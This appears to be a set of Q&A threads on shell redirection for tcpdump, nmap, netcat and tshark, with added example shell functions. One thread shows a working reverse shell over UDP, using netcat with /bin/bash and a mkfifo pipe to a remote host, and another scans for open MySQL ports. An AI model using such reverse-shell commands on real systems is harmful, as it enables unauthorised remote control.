In a bash script I need to run a tcpdump command and save the output to a file; however, when I do that via > /tmp/test.txt I still get the following output in the console:
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 1500 bytes
1 packet captured
1 packet received by filter
0 packets dropped by kernel
However, I do want the script to wait for the command to complete before continuing.
Is it possible to suppress this output?
The output you're seeing is written to stderr, not stdout, so you can redirect it to /dev/null if you don't want to see it. For example:
tcpdump -nn -v -i eth0 -s 1500 -c 1 'ether proto 0x88cc' > /tmp/test.txt 2> /dev/null
I have written the following shell script:
#! /bin/bash
# This script is designed to find hosts with MySQL installed
nmap -sT my_IP_address -p 3306 >/dev/null -oG MySQLscan
cat MySQLscan | grep open > MySQLscan2
cat MySQLscan2
According to the script the output of nmap should be sent to /dev/null. On the other hand, the final output should be written to the file MySQLscan2 in my pwd.
Not as I have expected, two files are written to my pwd:
MySQLscan: Contains the output of the scan that I have expected to be in MySQLscan2.
MySQLscan2: This file is empty.
Is there a mistake in my script? How can I solve the problem?
Earlier today, I managed to run the script with correct output. I am not sure if I have changed the script in some way. I checked it again and again, but cannot find what is wrong...
I am working with Kali Linux and Oracle VM Virtual Box.
> /dev/null causes the shell to redirect stdout, that is, the file with file descriptor 1, to /dev/null before the command starts, in other words to discard it. When nmap runs with the -oG MySQLscan option it opens a new file and gets a new file descriptor. You can check it with strace:
$ strace -f nmap -sT localhost -p 3306 -oG MySQLscan |& grep MySQLscan
execve("/usr/bin/nmap", ["nmap", "-sT", "localhost", "-p", "22", "-oG", "MySQLscan"], 0x7ffc88805198 /* 60 vars */) = 0
openat(AT_FDCWD, "MySQLscan", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 4
In this example openat() returned 4 as a new file descriptor (you can read more about this function with man 2 openat). Since file descriptor 4 hasn't been redirected before the command started, MySQLscan gets created. Also notice that even if the file descriptor that openat() returns to open MySQLscan is redirected to /dev/null:
nmap -sT localhost -p 22 -oG MySQLscan 4>/dev/null
it doesn't prevent MySQLscan from being created because openat() requests a new unused file descriptor from the kernel every time it's run.
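The descriptor behaviour described in this answer can be reproduced without nmap or root with the following added shell example (not from the original answer). write_report is a constructed stand-in for a tool that prints a banner on stdout and opens its own report file, as nmap does with -oG FILE, and "-" mirrors nmap's "-oG -" (report to stdout):

```shell
#!/bin/sh
# Added example, not from the original answer: reproduces the descriptor
# behaviour described above without nmap or root. "write_report" is a
# constructed stand-in for a tool that prints a banner on stdout and opens
# its own report file (like nmap -oG FILE); "-" means "report to stdout",
# mirroring nmap's "-oG -".

write_report() {
    echo "Starting scan (this line goes to fd 1)"
    line="Host: 127.0.0.1 () Ports: 3306/open/tcp//mysql///"
    if [ "$1" = "-" ]; then echo "$line"; else echo "$line" > "$1"; fi
}

# Run the stand-in exactly as the question did: fd 1 discarded, and fd 4
# (the number openat() happened to return under strace) also discarded.
# Prints "created" if the report file still appeared on disk.
demo_fd_redirect() {
    dir=$(mktemp -d) || return 1
    report="$dir/MySQLscan"
    # 1>/dev/null drops the banner. 4>/dev/null only pre-opens fd 4 to
    # /dev/null; the program's own open() is handed the next free
    # descriptor, so the file is created regardless.
    write_report "$report" > /dev/null 4> /dev/null
    if [ -s "$report" ]; then result=created; else result=missing; fi
    rm -rf "$dir"
    echo "$result"
}

# What the question's script was reaching for: have the tool write the
# report to stdout and filter that with grep, instead of discarding fd 1.
demo_report_to_stdout() {
    write_report - | grep -c open
}
```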
I want to get a reverse shell over UDP using netcat. Netcat by default sends traffic over TCP, so in order to send it over UDP I run the -u option like this:
Host 1:
nc.traditional -l -p 4444 -v -u
Host 2:
nc.traditional localhost 4444 -e /bin/bash -u
But when I type a bash command I do not get the output. Why is that?
There are several problems with this:
You use localhost on Host 2. This is a special hostname that refers to the current host, not to Host 1.
UDP has no connections. Host 1 won't know where to send packets if it doesn't receive a message first.
bash reads input character by character, which doesn't work well with non-stream packet based data.
You can instead connect nc and bash with streams, and then send an immediate packet so that Host 1 will know where to send the commands you enter:
Host 1:
nc.traditional -l -p 4444 -v -u
Host 2:
mkfifo fifo
nc.traditional -u host1 4444 < fifo |
{
echo "Hi"
bash
} > fifo
When trying to capture tcpdump output to a file, I get the following:
▒ò▒▒▒▒3▒X▒▒<<▒▒▒▒▒▒▒4▒4▒b
7
7▒▒3▒X▒▒<<▒▒▒▒▒▒▒4▒4▒b
7
7▒▒3▒X▒▒<<▒▒▒▒▒▒▒4▒4▒b
7
7▒▒3▒X▒<<▒▒▒▒▒▒▒4▒4▒b
7
7▒▒3▒Xu<<▒▒▒▒▒▒▒4▒4▒b
7
7▒▒3▒X▒<<▒▒▒▒▒▒▒4▒4▒b
7
7▒▒3▒X▒D<<▒▒▒▒▒▒▒4▒4▒b
7
7▒▒3▒X▒D<<▒▒▒▒▒▒▒4▒4▒b
7
7▒▒3▒X5▒<<▒▒▒▒▒▒▒4▒4▒b
7
7▒▒3▒X▒<<▒▒▒▒▒▒▒4▒4▒b
If I run tcpdump without the -w the output displays fine in the shell.
Here is the input:
tcpdump -i eth0 -Z root -w `date '+%m-%d-%y.%T.pcap'`
tcpdump -w writes the raw file, which is not meant for reading directly. You can read the file back with the tcpdump -r option as suggested in the man page:
-r Read packets from file (which was created with the -w option). Standard input is used if file is ‘‘-’’.
-w Write the raw packets to file rather than parsing and printing them out. They can later be printed with the -r option. Standard output is used if file is ‘‘-’’. See pcap-savefile(5) for a description of the file format.
Another option would be to redirect the output without using the -w option:
tcpdump -i eth0 -Z root > `date '+%m-%d-%y.%T.pcap'`
But if I remember correctly you don’t get exactly what would be written with the -w option.
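A script that may receive either kind of file can tell them apart by the magic number that pcap-savefile(5) specifies, as in this added shell example (not from the original answer); pcap_kind and show_capture are names chosen here, and the sample files in the test are constructed:

```shell
#!/bin/sh
# Added example, not from the original answer: distinguishes a raw "-w"
# savefile from text output by its first four bytes (the magic number
# from pcap-savefile(5)), so a script knows whether "tcpdump -r" is the
# right way to read it back. Assumption: POSIX sh with od(1).

# Prints one of: pcap-le, pcap-be, pcap-ns-le, pcap-ns-be, pcapng, text, unknown
pcap_kind() {
    magic=$(od -An -tx1 -N4 "$1" | tr -d ' \n')
    case "$magic" in
        d4c3b2a1) echo pcap-le ;;     # classic pcap, little-endian (x86 hosts)
        a1b2c3d4) echo pcap-be ;;     # classic pcap, big-endian
        4d3cb2a1) echo pcap-ns-le ;;  # nanosecond-timestamp variant
        a1b23c4d) echo pcap-ns-be ;;
        0a0d0d0a) echo pcapng ;;      # pcapng section header block
        *)
            # Decoded tcpdump text starts with a printable timestamp line;
            # anything with non-printable bytes is some other binary file.
            if LC_ALL=C grep -q '[^[:print:][:space:]]' "$1"; then
                echo unknown
            else
                echo text
            fi ;;
    esac
}

# Read a file back the right way: savefiles need "tcpdump -r", text needs cat.
show_capture() {
    case $(pcap_kind "$1") in
        pcap*|pcapng) tcpdump -nr "$1" ;;
        text)         cat "$1" ;;
        *)            echo "not a capture file: $1" >&2; return 1 ;;
    esac
}
```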
I am trying to save the output of a grep filter to a file.
I want to run tcpdump for a long time, and filter a certain IP to a file.
tcpdump -i eth0 -n -s 0 port 5060 -vvv | grep "A.B.C."
This works fine. It shows me IPs from my network.
But when I add >> file.dump at the end, the file is always empty.
My script:
tcpdump -i eth0 -n -s 0 port 5060 -vvv | grep "A.B.C." >> file.dump
And yes, it must be grep. I don't want to use tcpdump filters because it gives me millions of lines and with grep I get only one line per IP.
How can I redirect (append) the full output of the grep command to a file?
The output of tcpdump is probably going through stderr, not stdout. This means that grep won't catch it unless you convert it into stdout.
To do this you can use |&:
tcpdump -i eth0 -n -s 0 port 5060 -vvv |& grep "A.B.C."
Then, it may happen that the output is a continuous stream, so that you somehow have to tell grep to use line buffering. For this you have the --line-buffered option.
All together, say:
tcpdump ... |& grep --line-buffered "A.B.C." >> file.dump
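The redirections from this answer and from the first answer on this page (stderr to /dev/null while still waiting for the command) can be checked offline with the following added shell example (not from either answer). fake_tcpdump is a constructed stand-in that writes its banner and summary on stderr and the decoded packets on stdout, the split both questions ran into:

```shell
#!/bin/sh
# Added example, not from either original answer. "fake_tcpdump" is a
# constructed stand-in for tcpdump: banner and summary on stderr, decoded
# packets on stdout, exactly the split the two questions ran into.

fake_tcpdump() {
    echo "tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 1500 bytes" >&2
    echo "12:00:00.000001 IP 10.1.2.3.5060 > 10.9.9.9.5060: SIP/2.0 200 OK"
    echo "12:00:00.000002 IP 10.9.9.9.5060 > 10.1.2.3.5060: SIP: INVITE"
    echo "12:00:00.000003 IP 10.1.2.4.5060 > 10.9.9.9.5060: SIP/2.0 200 OK"
    echo "3 packets captured" >&2
    echo "3 packets received by filter" >&2
    echo "0 packets dropped by kernel" >&2
}

# First question: keep the packets in $1, silence stderr, and still block
# until the command exits. Prints the number of lines saved.
capture_quiet() {
    fake_tcpdump > "$1" 2> /dev/null
    wc -l < "$1" | tr -d ' '
}

# Count lines matching $2 that reach grep. $1 = yes merges stderr into the
# pipe ("2>&1 |" is the portable spelling of bash's "|&"); otherwise only
# stdout flows through the pipe and the stderr lines never reach grep.
count_matches() {
    if [ "$1" = yes ]; then
        fake_tcpdump 2>&1 | grep -c "$2"
    else
        fake_tcpdump 2>/dev/null | grep -c "$2"
    fi
}

# grep question: append matching lines to $2 as they arrive. Without
# --line-buffered grep holds a block of output until it exits, so a file
# watched during a long capture looks empty even though matches occurred.
filter_ip() {
    fake_tcpdump 2>&1 | grep --line-buffered "$1" >> "$2"
    wc -l < "$2" | tr -d ' '
}
```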
I have basically two lines of code which are:
tcpdump -i eth0 -s 65535 -w - >/tmp/Captures
tshark -i /tmp/Captures -T pdml >results.xml
If I run them both in separate terminals it works fine.
However I've been trying to create a simple bash script that will execute them at the same time, but have had no luck. Bash script is as follows:
#! /bin/bash
tcpdump -i eth0 -s 65535 -w - >/tmp/Captures &
tshark -i /tmp/Captures -T pdml >results.xml &
If anyone could possibly help in getting this to work, or getting it to "run tcpdump until a key is pressed, then run tshark, then when a key is pressed again close."
I have only a little bash scripting experience.
Do you need to run tcpdump and tshark separately? Using a pipe command will feed the output of tcpdump to the input of tshark.
tcpdump -i eth0 -s 65535 -w - | tshark -r - -T pdml > results.xml
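For the two-phase flow the question asked for (capture until a key is pressed, then decode), here is an added shell example that is not from the original answer. The interface, file paths and the "run" argument are placeholders chosen here; run_until_enter is tested with a stand-in command, since tcpdump needs root and an interface:

```shell
#!/bin/sh
# Added example, not from the original answer: the "capture until a key is
# pressed, then decode" flow the question asks for. The capture runs in
# the background, Enter stops it, and tshark then reads the finished
# savefile. SIGTERM is used rather than SIGKILL so tcpdump can flush and
# close the file; tcpdump's own handler treats it like Ctrl-C.
# Assumptions: POSIX sh; interface, paths and the "run" argument are
# placeholders chosen here.

# Start "$@" in the background, wait for a line on stdin, stop the job
# and return its exit status (128+15 = 143 if it was ended by SIGTERM).
run_until_enter() {
    "$@" &
    pid=$!
    # If the script itself is interrupted, do not leave the capture running.
    trap 'kill -s TERM "$pid" 2>/dev/null' INT TERM
    read -r _ignored
    kill -s TERM "$pid" 2>/dev/null
    status=0
    wait "$pid" || status=$?
    trap - INT TERM
    return "$status"
}

main() {
    file=/tmp/Captures.pcap
    echo "Capturing on eth0 to $file; press Enter to stop." >&2
    run_until_enter tcpdump -i eth0 -s 65535 -w "$file"
    echo "Decoding $file with tshark into results.xml" >&2
    tshark -r "$file" -T pdml > results.xml
}

# For a single live pipeline instead of two phases, use
# tcpdump -i eth0 -s 65535 -w - | tshark -r - -T pdml > results.xml
case "${1:-}" in run) main ;; esac
```

Invoke the script with the argument run to start the capture; any other invocation only defines the functions.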